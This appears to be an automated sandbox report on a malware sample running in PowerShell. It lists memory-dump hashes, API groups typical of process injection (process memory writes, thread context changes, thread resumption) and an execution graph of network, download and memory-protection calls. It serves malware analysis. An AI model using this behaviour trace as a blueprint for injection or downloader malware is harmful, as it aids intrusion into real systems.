                                                • Opcode ID: a8147ab4ef75d43e1a016039b0ed2b720120c9c9f9d6699655195e7cdd657b77
                                                • Instruction ID: 9969da7bafc3c732524c82466edffe75d49cab10bec7ad30474feb588a1e8c4d
                                                • Opcode Fuzzy Hash: a8147ab4ef75d43e1a016039b0ed2b720120c9c9f9d6699655195e7cdd657b77
                                                • Instruction Fuzzy Hash: 48C1E670908A5D8FDB98DF58C894BE9B7F1FB69301F1011AAD40EE3691DB75AA84CF40

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 90e2ed570cbd65326a6d95431640f21844e4a0ed945383e2177cc0d6c36d7ee5
                                                • Instruction ID: f72dce96173a5118e637d85d5e13f4c0b7e771f90b8625e0e4e8e66a5179ff5c
                                                • Opcode Fuzzy Hash: 90e2ed570cbd65326a6d95431640f21844e4a0ed945383e2177cc0d6c36d7ee5
                                                • Instruction Fuzzy Hash: 69611270908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB44

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 23a092335f705f736b3804d0b5df2dee3c57747f4984f806c064818db8b40fab
                                                • Instruction ID: 33e23a17b6e11336d01ff025b6e05c6a60ddc8d7cf3acc5537612ac566a1e76a
                                                • Opcode Fuzzy Hash: 23a092335f705f736b3804d0b5df2dee3c57747f4984f806c064818db8b40fab
                                                • Instruction Fuzzy Hash: 6D51F070908A1D8FDB98DF98C884BE9BBF1FB69314F1051AED04EE3251DB74A985CB44

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 405c29ff3f5d1ceda87ec007d8797666b619b4755aa225b93876c843f7ee6748
                                                • Instruction ID: 67f077bc69279be5746aca7001430f7ea6a6f9d910f4f4a2d44bdc6adb5ea58a
                                                • Opcode Fuzzy Hash: 405c29ff3f5d1ceda87ec007d8797666b619b4755aa225b93876c843f7ee6748
                                                • Instruction Fuzzy Hash: 17517E70D0864D8FDB55DF98C844BE9BBF1FB66311F10829AD048E7266D774A485CF50

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 30066806eebd1723e33e958d9ebc2561dbda9f558d4194e86c09e4ec7071f1b5
                                                • Instruction ID: 53a9bd4b3b83d19324c4683787472fe551ea014a7b8c1ba053f4a6ef446e7f6e
                                                • Opcode Fuzzy Hash: 30066806eebd1723e33e958d9ebc2561dbda9f558d4194e86c09e4ec7071f1b5
                                                • Instruction Fuzzy Hash: D7510870D08A1D8FEB94DF99C484BE9BBF1FBA9311F10826AD009E3255D774A985CF80

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: d64c9d9163691c4a46477b5c0c3b58df943439822b2376c096d28156a8587f43
                                                • Instruction ID: 4b99ee1cd5a287ec8c7a28cd3d6e5e3c600ad00ece8db874f6c06aec6ed22e53
                                                • Opcode Fuzzy Hash: d64c9d9163691c4a46477b5c0c3b58df943439822b2376c096d28156a8587f43
                                                • Instruction Fuzzy Hash: C8510870D08A1D8FEB94DF99C484BE9BBF1FBA9311F10826AD009E3255D774A985CF80

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3dcb76b804c9e98670f57046320d9ece9c98290b176ded64d6fb0dc87b0ecddd
                                                • Instruction ID: 4b451a70c5f242485da2cc2f0d5fa70a1e6695beb9ea773c862b5763dc76349d
                                                • Opcode Fuzzy Hash: 3dcb76b804c9e98670f57046320d9ece9c98290b176ded64d6fb0dc87b0ecddd
                                                • Instruction Fuzzy Hash: 9E414B70D0874C8FDB59DF98D885BADBBF0FB5A310F10419ED049E7292DA74A886CB51

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 290abd34a90297a3e1678cbdf254c815933ee3d24cb1e5b991db1529d09e3164
                                                • Instruction ID: eca266386cf9c6f972449e35814bfe647490d4b0413e22d093585c6b5377e97f
                                                • Opcode Fuzzy Hash: 290abd34a90297a3e1678cbdf254c815933ee3d24cb1e5b991db1529d09e3164
                                                • Instruction Fuzzy Hash: DF41F770E08A0C8FDB98DF98D885BADBBF0FB5A310F10516ED049E7251DA70A886CB51

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6&
                                                • API String ID: 0-673405558
                                                • Opcode ID: 87a50c15a25608c76350b5dcb9e41b1c4c11aafc054b3636f90fc32846e1595e
                                                • Instruction ID: 46285410770ad9308fcf0fc5a4d7989c4ff750cf0ce3e8494b69ba1d3bf14ad5
                                                • Opcode Fuzzy Hash: 87a50c15a25608c76350b5dcb9e41b1c4c11aafc054b3636f90fc32846e1595e
                                                • Instruction Fuzzy Hash: 8C21F331B0CAA94FEB56A76CA8153FDB7D2EB99750F1801E7C44EC31B2DA19A8158390

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6&
                                                • API String ID: 0-673405558
                                                • Opcode ID: 8ea821b10020111469a21bb47f3ad59ec659686f8118a5b843244f25e287bb4e
                                                • Instruction ID: ea933eef9af90b13b2f193a3b31c239e402defc19a2e3378cb5326a143e44d50
                                                • Opcode Fuzzy Hash: 8ea821b10020111469a21bb47f3ad59ec659686f8118a5b843244f25e287bb4e
                                                • Instruction Fuzzy Hash: A5F02E21F0D9990FF756A3BC28153F86BD1EF59250B1441F7C48EC72B3DA145C148381

                                                Execution Graph

                                                Execution Coverage:5.7%
                                                Dynamic/Decrypted Code Coverage:19.5%
                                                Signature Coverage:3.4%
                                                Total number of Nodes:1533
                                                Total number of Limit Nodes:46
                                                execution_graph 53075 415d41 53090 41b411 53075->53090 53077 415d4a 53101 4020f6 53077->53101 53082 4170c4 53125 401e8d 53082->53125 53086 401fd8 11 API calls 53087 4170d9 53086->53087 53088 401fd8 11 API calls 53087->53088 53089 4170e5 53088->53089 53131 4020df 53090->53131 53095 41b456 InternetReadFile 53100 41b479 53095->53100 53096 41b4a6 InternetCloseHandle InternetCloseHandle 53098 41b4b8 53096->53098 53098->53077 53099 401fd8 11 API calls 53099->53100 53100->53095 53100->53096 53100->53099 53142 4020b7 53100->53142 53102 40210c 53101->53102 53103 4023ce 11 API calls 53102->53103 53104 402126 53103->53104 53105 402569 28 API calls 53104->53105 53106 402134 53105->53106 53107 404aa1 53106->53107 53108 404ab4 53107->53108 53209 40520c 53108->53209 53110 404ac9 ctype 53111 404b40 WaitForSingleObject 53110->53111 53112 404b20 53110->53112 53114 404b56 53111->53114 53113 404b32 send 53112->53113 53115 404b7b 53113->53115 53215 4210cb 54 API calls 53114->53215 53118 401fd8 11 API calls 53115->53118 53117 404b69 SetEvent 53117->53115 53119 404b83 53118->53119 53120 401fd8 11 API calls 53119->53120 53121 404b8b 53120->53121 53121->53082 53122 401fd8 53121->53122 53123 4023ce 11 API calls 53122->53123 53124 401fe1 53123->53124 53124->53082 53126 402163 53125->53126 53130 40219f 53126->53130 53233 402730 11 API calls 53126->53233 53128 402184 53234 402712 11 API calls std::_Deallocate 53128->53234 53130->53086 53132 4020e7 53131->53132 53148 4023ce 53132->53148 53134 4020f2 53135 43bda0 53134->53135 53140 4461b8 __Getctype 53135->53140 53136 4461f6 53164 44062d 20 API calls _Atexit 53136->53164 53137 4461e1 RtlAllocateHeap 53139 41b42f InternetOpenW InternetOpenUrlW 53137->53139 53137->53140 53139->53095 53140->53136 53140->53137 53163 443001 7 API calls 2 library calls 53140->53163 53143 4020bf 53142->53143 53144 4023ce 11 API calls 53143->53144 53145 4020ca 53144->53145 53165 40250a 53145->53165 53147 4020d9 
53147->53100 53149 402428 53148->53149 53150 4023d8 53148->53150 53149->53134 53150->53149 53152 4027a7 53150->53152 53153 402e21 53152->53153 53156 4016b4 53153->53156 53155 402e30 53155->53149 53157 4016c6 53156->53157 53158 4016cb 53156->53158 53162 43bd68 11 API calls _Atexit 53157->53162 53158->53157 53159 4016f3 53158->53159 53159->53155 53161 43bd67 53162->53161 53163->53140 53164->53139 53166 40251a 53165->53166 53167 402520 53166->53167 53168 402535 53166->53168 53172 402569 53167->53172 53182 4028e8 53168->53182 53171 402533 53171->53147 53193 402888 53172->53193 53174 40257d 53175 402592 53174->53175 53176 4025a7 53174->53176 53198 402a34 22 API calls 53175->53198 53178 4028e8 28 API calls 53176->53178 53181 4025a5 53178->53181 53179 40259b 53199 4029da 22 API calls 53179->53199 53181->53171 53183 4028f1 53182->53183 53184 402953 53183->53184 53185 4028fb 53183->53185 53207 4028a4 22 API calls 53184->53207 53188 402904 53185->53188 53190 402917 53185->53190 53201 402cae 53188->53201 53189 402915 53189->53171 53190->53189 53192 4023ce 11 API calls 53190->53192 53192->53189 53194 402890 53193->53194 53195 402898 53194->53195 53200 402ca3 22 API calls 53194->53200 53195->53174 53198->53179 53199->53181 53202 402cb8 __EH_prolog 53201->53202 53208 402e54 22 API calls 53202->53208 53204 4023ce 11 API calls 53206 402d92 53204->53206 53205 402d24 53205->53204 53206->53189 53208->53205 53210 405214 53209->53210 53211 4023ce 11 API calls 53210->53211 53212 40521f 53211->53212 53216 405234 53212->53216 53214 40522e 53214->53110 53215->53117 53217 405240 53216->53217 53218 40526e 53216->53218 53219 4028e8 28 API calls 53217->53219 53232 4028a4 22 API calls 53218->53232 53221 40524a 53219->53221 53221->53214 53233->53128 53234->53130 53235 10006d60 53236 10006d69 53235->53236 53237 10006d72 53235->53237 53239 10006c5f 53236->53239 53259 10005af6 GetLastError 53239->53259 53241 10006c6c 53279 10006d7e 53241->53279 53243 10006c74 53288 100069f3 53243->53288 53246 
10006c8b 53246->53237 53249 10006cce 53313 1000571e 19 API calls _free 53249->53313 53253 10006cc9 53312 10006368 19 API calls __dosmaperr 53253->53312 53255 10006d12 53255->53249 53315 100068c9 25 API calls 53255->53315 53256 10006ce6 53256->53255 53314 1000571e 19 API calls _free 53256->53314 53260 10005b12 53259->53260 53261 10005b0c 53259->53261 53265 10005b61 SetLastError 53260->53265 53317 1000637b 19 API calls 2 library calls 53260->53317 53316 10005e08 10 API calls 2 library calls 53261->53316 53264 10005b24 53266 10005b2c 53264->53266 53319 10005e5e 10 API calls 2 library calls 53264->53319 53265->53241 53318 1000571e 19 API calls _free 53266->53318 53268 10005b41 53268->53266 53270 10005b48 53268->53270 53320 1000593c 19 API calls _abort 53270->53320 53271 10005b32 53273 10005b6d SetLastError 53271->53273 53322 100055a8 36 API calls _abort 53273->53322 53274 10005b53 53321 1000571e 19 API calls _free 53274->53321 53278 10005b5a 53278->53265 53278->53273 53280 10006d8a ___DestructExceptionObject 53279->53280 53281 10005af6 _abort 36 API calls 53280->53281 53286 10006d94 53281->53286 53283 10006e18 _abort 53283->53243 53286->53283 53323 100055a8 36 API calls _abort 53286->53323 53324 10005671 RtlEnterCriticalSection 53286->53324 53325 1000571e 19 API calls _free 53286->53325 53326 10006e0f RtlLeaveCriticalSection _abort 53286->53326 53327 100054a7 53288->53327 53291 10006a14 GetOEMCP 53293 10006a3d 53291->53293 53292 10006a26 53292->53293 53294 10006a2b GetACP 53292->53294 53293->53246 53295 100056d0 53293->53295 53294->53293 53296 1000570e 53295->53296 53301 100056de _abort 53295->53301 53338 10006368 19 API calls __dosmaperr 53296->53338 53297 100056f9 RtlAllocateHeap 53299 1000570c 53297->53299 53297->53301 53299->53249 53302 10006e20 53299->53302 53301->53296 53301->53297 53337 1000474f 7 API calls 2 library calls 53301->53337 53303 100069f3 38 API calls 53302->53303 53304 10006e3f 53303->53304 53307 10006e90 IsValidCodePage 53304->53307 53309 10006e46 
53304->53309 53311 10006eb5 ___scrt_fastfail 53304->53311 53306 10006cc1 53306->53253 53306->53256 53308 10006ea2 GetCPInfo 53307->53308 53307->53309 53308->53309 53308->53311 53349 10002ada 53309->53349 53339 10006acb GetCPInfo 53311->53339 53312->53249 53313->53246 53314->53255 53315->53249 53316->53260 53317->53264 53318->53271 53319->53268 53320->53274 53321->53278 53324->53286 53325->53286 53326->53286 53328 100054c4 53327->53328 53334 100054ba 53327->53334 53329 10005af6 _abort 36 API calls 53328->53329 53328->53334 53330 100054e5 53329->53330 53335 10007a00 36 API calls __fassign 53330->53335 53332 100054fe 53336 10007a2d 36 API calls __fassign 53332->53336 53334->53291 53334->53292 53335->53332 53336->53334 53337->53301 53338->53299 53345 10006b05 53339->53345 53348 10006baf 53339->53348 53342 10002ada _ValidateLocalCookies 5 API calls 53344 10006c5b 53342->53344 53344->53309 53356 100086e4 53345->53356 53347 10008a3e 41 API calls 53347->53348 53348->53342 53350 10002ae3 53349->53350 53351 10002ae5 IsProcessorFeaturePresent 53349->53351 53350->53306 53353 10002b58 53351->53353 53426 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53353->53426 53355 10002c3b 53355->53306 53357 100054a7 __fassign 36 API calls 53356->53357 53358 10008704 MultiByteToWideChar 53357->53358 53360 10008742 53358->53360 53368 100087da 53358->53368 53362 100056d0 20 API calls 53360->53362 53365 10008763 ___scrt_fastfail 53360->53365 53361 10002ada _ValidateLocalCookies 5 API calls 53363 10006b66 53361->53363 53362->53365 53370 10008a3e 53363->53370 53364 100087d4 53375 10008801 19 API calls _free 53364->53375 53365->53364 53367 100087a8 MultiByteToWideChar 53365->53367 53367->53364 53369 100087c4 GetStringTypeW 53367->53369 53368->53361 53369->53364 53371 100054a7 __fassign 36 API calls 53370->53371 53372 10008a51 53371->53372 53376 10008821 53372->53376 53375->53368 53377 1000883c 53376->53377 53378 10008862 MultiByteToWideChar 
53377->53378 53379 10008a16 53378->53379 53380 1000888c 53378->53380 53381 10002ada _ValidateLocalCookies 5 API calls 53379->53381 53384 100056d0 20 API calls 53380->53384 53385 100088ad 53380->53385 53382 10006b87 53381->53382 53382->53347 53383 100088f6 MultiByteToWideChar 53386 1000890f 53383->53386 53398 10008962 53383->53398 53384->53385 53385->53383 53385->53398 53403 10005f19 53386->53403 53390 10008971 53392 10008992 53390->53392 53393 100056d0 20 API calls 53390->53393 53391 10008939 53395 10005f19 10 API calls 53391->53395 53391->53398 53394 10008a07 53392->53394 53397 10005f19 10 API calls 53392->53397 53393->53392 53411 10008801 19 API calls _free 53394->53411 53395->53398 53399 100089e6 53397->53399 53412 10008801 19 API calls _free 53398->53412 53399->53394 53400 100089f5 WideCharToMultiByte 53399->53400 53400->53394 53401 10008a35 53400->53401 53413 10008801 19 API calls _free 53401->53413 53414 10005c45 53403->53414 53405 10005f40 53406 10005f49 53405->53406 53418 10005fa1 9 API calls 2 library calls 53405->53418 53409 10002ada _ValidateLocalCookies 5 API calls 53406->53409 53408 10005f89 LCMapStringW 53408->53406 53410 10005f9b 53409->53410 53410->53390 53410->53391 53410->53398 53411->53398 53412->53379 53413->53398 53415 10005c71 53414->53415 53417 10005c75 __crt_fast_encode_pointer 53414->53417 53415->53417 53419 10005ce1 53415->53419 53417->53405 53418->53408 53420 10005d02 LoadLibraryExW 53419->53420 53421 10005cf7 53419->53421 53422 10005d37 53420->53422 53423 10005d1f GetLastError 53420->53423 53421->53415 53422->53421 53425 10005d4e FreeLibrary 53422->53425 53423->53422 53424 10005d2a LoadLibraryExW 53423->53424 53424->53422 53425->53421 53426->53355 53427 434906 53432 434bd8 SetUnhandledExceptionFilter 53427->53432 53429 43490b pre_c_initialization 53433 4455cc 20 API calls 2 library calls 53429->53433 53431 434916 53432->53429 53433->53431 53434 1000c7a7 53435 1000c7be 53434->53435 53440 1000c82c 53434->53440 53435->53440 53444 1000c7e6 
GetModuleHandleA 53435->53444 53436 1000c872 53437 1000c835 GetModuleHandleA 53439 1000c83f 53437->53439 53439->53439 53439->53440 53440->53436 53440->53437 53445 1000c7ef 53444->53445 53451 1000c82c 53444->53451 53454 1000c803 53445->53454 53447 1000c872 53448 1000c835 GetModuleHandleA 53449 1000c83f 53448->53449 53449->53449 53449->53451 53451->53447 53451->53448 53455 1000c809 53454->53455 53456 1000c82c 53455->53456 53457 1000c80d VirtualProtect 53455->53457 53459 1000c835 GetModuleHandleA 53456->53459 53460 1000c872 53456->53460 53457->53456 53458 1000c81c VirtualProtect 53457->53458 53458->53456 53461 1000c83f 53459->53461 53461->53456 53462 43bea8 53465 43beb4 _swprintf CallCatchBlock 53462->53465 53463 43bec2 53478 44062d 20 API calls _Atexit 53463->53478 53465->53463 53466 43beec 53465->53466 53473 445909 EnterCriticalSection 53466->53473 53468 43bec7 pre_c_initialization CallCatchBlock 53469 43bef7 53474 43bf98 53469->53474 53473->53469 53475 43bfa6 53474->53475 53477 43bf02 53475->53477 53480 4497ec 37 API calls 2 library calls 53475->53480 53479 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53477->53479 53478->53468 53479->53468 53480->53475 53481 4458c8 53483 4458d3 53481->53483 53484 4458fc 53483->53484 53485 4458f8 53483->53485 53487 448b04 53483->53487 53494 445920 DeleteCriticalSection 53484->53494 53495 44854a 53487->53495 53490 448b49 InitializeCriticalSectionAndSpinCount 53491 448b34 53490->53491 53502 43502b 53491->53502 53493 448b60 53493->53483 53494->53485 53496 448576 53495->53496 53497 44857a 53495->53497 53496->53497 53499 44859a 53496->53499 53509 4485e6 53496->53509 53497->53490 53497->53491 53499->53497 53500 4485a6 GetProcAddress 53499->53500 53501 4485b6 __crt_fast_encode_pointer 53500->53501 53501->53497 53503 435036 IsProcessorFeaturePresent 53502->53503 53504 435034 53502->53504 53506 435078 53503->53506 53504->53493 53516 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 
53506->53516 53508 43515b 53508->53493 53510 448607 LoadLibraryExW 53509->53510 53515 4485fc 53509->53515 53511 448624 GetLastError 53510->53511 53512 44863c 53510->53512 53511->53512 53513 44862f LoadLibraryExW 53511->53513 53514 448653 FreeLibrary 53512->53514 53512->53515 53513->53512 53514->53515 53515->53496 53516->53508 53517 41e04e 53518 41e063 ctype ___scrt_fastfail 53517->53518 53519 41e266 53518->53519 53520 432f55 21 API calls 53518->53520 53525 41e21a 53519->53525 53531 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53519->53531 53524 41e213 ___scrt_fastfail 53520->53524 53522 41e277 53522->53525 53532 432f55 53522->53532 53524->53525 53526 432f55 21 API calls 53524->53526 53529 41e240 ___scrt_fastfail 53526->53529 53527 41e2b0 ___scrt_fastfail 53527->53525 53537 4335db 53527->53537 53529->53525 53530 432f55 21 API calls 53529->53530 53530->53519 53531->53522 53533 432f63 53532->53533 53534 432f5f 53532->53534 53535 43bda0 ___std_exception_copy 21 API calls 53533->53535 53534->53527 53536 432f68 53535->53536 53536->53527 53540 4334fa 53537->53540 53539 4335e3 53539->53525 53541 433513 53540->53541 53545 433509 53540->53545 53542 432f55 21 API calls 53541->53542 53541->53545 53543 433534 53542->53543 53543->53545 53546 4338c8 CryptAcquireContextA 53543->53546 53545->53539 53547 4338e9 CryptGenRandom 53546->53547 53548 4338e4 53546->53548 53547->53548 53549 4338fe CryptReleaseContext 53547->53549 53548->53545 53549->53548 53550 426c6d 53556 426d42 recv 53550->53556 53557 426a77 53558 426a8c 53557->53558 53570 426b1e 53557->53570 53559 426b83 53558->53559 53560 426bae 53558->53560 53563 426b0e 53558->53563 53567 426b4e 53558->53567 53569 426ad9 53558->53569 53558->53570 53571 426bd5 53558->53571 53585 424f6e 49 API calls ctype 53558->53585 53559->53560 53589 425781 21 API calls 53559->53589 53560->53570 53560->53571 53573 425b72 53560->53573 53563->53567 53563->53570 53587 424f6e 49 API calls ctype 53563->53587 
53567->53559 53567->53570 53588 41fbfd 52 API calls 53567->53588 53569->53563 53569->53570 53586 41fbfd 52 API calls 53569->53586 53571->53570 53590 4261e6 28 API calls 53571->53590 53574 425b91 ___scrt_fastfail 53573->53574 53576 425ba0 53574->53576 53580 425bc5 53574->53580 53591 41ec4c 21 API calls 53574->53591 53576->53580 53584 425ba5 53576->53584 53592 420669 46 API calls 53576->53592 53579 425bae 53579->53580 53594 424d96 21 API calls 2 library calls 53579->53594 53580->53571 53582 425c48 53582->53580 53583 432f55 21 API calls 53582->53583 53583->53584 53584->53579 53584->53580 53593 41daf0 49 API calls 53584->53593 53585->53569 53586->53569 53587->53567 53588->53567 53589->53560 53590->53570 53591->53576 53592->53582 53593->53579 53594->53580 53595 4165db 53606 401e65 53595->53606 53597 4165eb 53598 4020f6 28 API calls 53597->53598 53599 4165f6 53598->53599 53600 401e65 22 API calls 53599->53600 53601 416601 53600->53601 53602 4020f6 28 API calls 53601->53602 53603 41660c 53602->53603 53611 412965 53603->53611 53607 401e6d 53606->53607 53608 401e75 53607->53608 53630 402158 22 API calls 53607->53630 53608->53597 53631 40482d 53611->53631 53613 412979 53638 4048c8 connect 53613->53638 53617 41299a 53703 402f10 53617->53703 53620 404aa1 61 API calls 53621 4129ae 53620->53621 53622 401fd8 11 API calls 53621->53622 53623 4129b6 53622->53623 53708 404c10 53623->53708 53626 401fd8 11 API calls 53627 4129cc 53626->53627 53628 401fd8 11 API calls 53627->53628 53629 4129d4 53628->53629 53632 404846 socket 53631->53632 53633 404839 53631->53633 53634 404860 CreateEventW 53632->53634 53635 404842 53632->53635 53726 40489e WSAStartup 53633->53726 53634->53613 53635->53613 53637 40483e 53637->53632 53637->53635 53639 404a1b 53638->53639 53640 4048ee 53638->53640 53641 40497e 53639->53641 53642 404a21 WSAGetLastError 53639->53642 53640->53641 53643 404923 53640->53643 53727 40531e 53640->53727 53698 402f31 53641->53698 53642->53641 53644 404a31 53642->53644 53762 420cf1 
27 API calls 53643->53762 53646 404932 53644->53646 53647 404a36 53644->53647 53652 402093 28 API calls 53646->53652 53767 41cb72 30 API calls 53647->53767 53649 40490f 53732 402093 53649->53732 53651 40492b 53651->53646 53655 404941 53651->53655 53656 404a80 53652->53656 53654 404a40 53768 4052fd 28 API calls 53654->53768 53662 404950 53655->53662 53663 404987 53655->53663 53659 402093 28 API calls 53656->53659 53664 404a8f 53659->53664 53666 402093 28 API calls 53662->53666 53764 421ad1 54 API calls 53663->53764 53667 41b580 80 API calls 53664->53667 53670 40495f 53666->53670 53667->53641 53673 402093 28 API calls 53670->53673 53671 40498f 53674 4049c4 53671->53674 53675 404994 53671->53675 53677 40496e 53673->53677 53766 420e97 28 API calls 53674->53766 53679 402093 28 API calls 53675->53679 53682 41b580 80 API calls 53677->53682 53681 4049a3 53679->53681 53684 402093 28 API calls 53681->53684 53685 404973 53682->53685 53683 4049cc 53686 4049f9 CreateEventW CreateEventW 53683->53686 53688 402093 28 API calls 53683->53688 53687 4049b2 53684->53687 53763 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53685->53763 53686->53641 53689 41b580 80 API calls 53687->53689 53691 4049e2 53688->53691 53692 4049b7 53689->53692 53693 402093 28 API calls 53691->53693 53765 421143 52 API calls 53692->53765 53695 4049f1 53693->53695 53696 41b580 80 API calls 53695->53696 53697 4049f6 53696->53697 53697->53686 53699 4020df 11 API calls 53698->53699 53700 402f3d 53699->53700 53701 4032a0 28 API calls 53700->53701 53702 402f59 53701->53702 53702->53617 53819 401fb0 53703->53819 53705 402f1e 53706 402055 11 API calls 53705->53706 53707 402f2d 53706->53707 53707->53620 53709 4020df 11 API calls 53708->53709 53710 404c27 53709->53710 53711 4020df 11 API calls 53710->53711 53714 404c30 53711->53714 53712 43bda0 ___std_exception_copy 21 API calls 53712->53714 53714->53712 53715 4020b7 28 API calls 53714->53715 53716 404ca1 53714->53716 53720 401fd8 11 API calls 
53714->53720 53822 404b96 53714->53822 53828 401fe2 53714->53828 53837 404cc3 53714->53837 53715->53714 53849 404e26 99 API calls 53716->53849 53719 404ca8 53721 401fd8 11 API calls 53719->53721 53720->53714 53722 404cb1 53721->53722 53723 401fd8 11 API calls 53722->53723 53724 404cba 53723->53724 53724->53626 53726->53637 53728 4020df 11 API calls 53727->53728 53729 40532a 53728->53729 53769 4032a0 53729->53769 53731 405346 53731->53649 53733 40209b 53732->53733 53734 4023ce 11 API calls 53733->53734 53735 4020a6 53734->53735 53773 4024ed 53735->53773 53738 41b580 53739 41b631 53738->53739 53740 41b596 GetLocalTime 53738->53740 53741 401fd8 11 API calls 53739->53741 53742 40531e 28 API calls 53740->53742 53743 41b639 53741->53743 53744 41b5d8 53742->53744 53745 401fd8 11 API calls 53743->53745 53777 406383 53744->53777 53748 41b641 53745->53748 53748->53643 53749 402f10 28 API calls 53750 41b5f0 53749->53750 53751 406383 28 API calls 53750->53751 53752 41b5fc 53751->53752 53782 40723b 77 API calls 53752->53782 53754 41b60a 53755 401fd8 11 API calls 53754->53755 53756 41b616 53755->53756 53757 401fd8 11 API calls 53756->53757 53758 41b61f 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 41b628 53759->53760 53761 401fd8 11 API calls 53760->53761 53761->53739 53762->53651 53763->53641 53764->53671 53765->53685 53766->53683 53767->53654 53771 4032aa 53769->53771 53770 4032c9 53770->53731 53771->53770 53772 4028e8 28 API calls 53771->53772 53772->53770 53774 4024f9 53773->53774 53775 40250a 28 API calls 53774->53775 53776 4020b1 53775->53776 53776->53738 53783 4051ef 53777->53783 53779 406391 53787 402055 53779->53787 53782->53754 53784 4051fb 53783->53784 53793 405274 53784->53793 53786 405208 53786->53779 53788 402061 53787->53788 53789 4023ce 11 API calls 53788->53789 53790 40207b 53789->53790 53815 40267a 53790->53815 53794 405282 53793->53794 53795 405288 53794->53795 53796 40529e 53794->53796 53804 4025f0 53795->53804 53798 4052f5 53796->53798 53799 
4052b6 53796->53799 53813 4028a4 22 API calls 53798->53813 53802 4028e8 28 API calls 53799->53802 53803 40529c 53799->53803 53802->53803 53803->53786 53805 402888 22 API calls 53804->53805 53806 402602 53805->53806 53807 402672 53806->53807 53808 402629 53806->53808 53814 4028a4 22 API calls 53807->53814 53810 4028e8 28 API calls 53808->53810 53812 40263b 53808->53812 53810->53812 53812->53803 53816 40268b 53815->53816 53817 4023ce 11 API calls 53816->53817 53818 40208d 53817->53818 53818->53749 53820 4025f0 28 API calls 53819->53820 53821 401fbd 53820->53821 53821->53705 53823 404ba0 WaitForSingleObject 53822->53823 53824 404bcd recv 53822->53824 53850 421107 54 API calls 53823->53850 53826 404be0 53824->53826 53826->53714 53827 404bbc SetEvent 53827->53826 53829 401ff1 53828->53829 53830 402039 53828->53830 53831 4023ce 11 API calls 53829->53831 53830->53714 53832 401ffa 53831->53832 53833 40203c 53832->53833 53835 402015 53832->53835 53834 40267a 11 API calls 53833->53834 53834->53830 53851 403098 28 API calls 53835->53851 53838 4020df 11 API calls 53837->53838 53848 404cde 53838->53848 53839 404e13 53840 401fd8 11 API calls 53839->53840 53841 404e1c 53840->53841 53841->53714 53842 4041a2 28 API calls 53842->53848 53843 401fe2 28 API calls 53843->53848 53844 401fd8 11 